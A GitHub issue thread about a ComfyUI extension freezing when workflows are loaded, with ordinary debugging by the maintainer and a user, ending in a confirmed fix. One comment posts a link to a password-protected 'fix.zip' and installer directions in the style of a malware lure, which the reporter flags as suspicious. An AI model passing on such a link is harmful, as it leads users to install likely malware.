### ISSUE TITLE
works on already open wfs, but can't create new ones or refresh

### ISSUE THREAD

**Issue by klinter007** [niknah/quick-connections#11]
this is what i get after installing
![image](https://github.com/user-attachments/assets/9829ddb4-41c4-45b4-93b1-03b10c2d1b97)

all updated 
no error on terminal, just impossible to use.

**Comment by africanobyamugisha** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by klinter007** [comment]
yea, this looks not suspicious at all

**Comment by niknah** [comment]
Can you save the workflow and clear it?
I've had a few people tell me that it stops working when they load a workflow, I suspect some workflows are not working with it but they haven't sent me any.

Also, press F12 and see if there are any errors in the "console"

**Comment by freshwind-bit** [comment]
Here is one example:
[https://mega.nz/file/cZNTSBxa#FY9ZlnVgKRpsbBXmUO91pi2y-_rGOG8y9MSh4P9HoT4](url)
I would also like to note that only deactivating the extension via the Manager helps. Disabling the plugin in the settings does not help in this case, nor does clearing the workflow space via the manager.
The effect is that, first of all, zooming of the loaded workflow space stops working (and it does not matter how the workflow was loaded: a json file via the menu or a drag-n-drop image).

**Comment by freshwind-bit** [comment]
@niknah Thank you very much for updating the package ([Added connect with dot option](https://github.com/niknah/quick-connections/commit/18767a6c0f572f33f0e6c8db5f0419a19c314a3b)). 
Those workflows that were problematic for this plugin now do not cause the workspace to freeze.
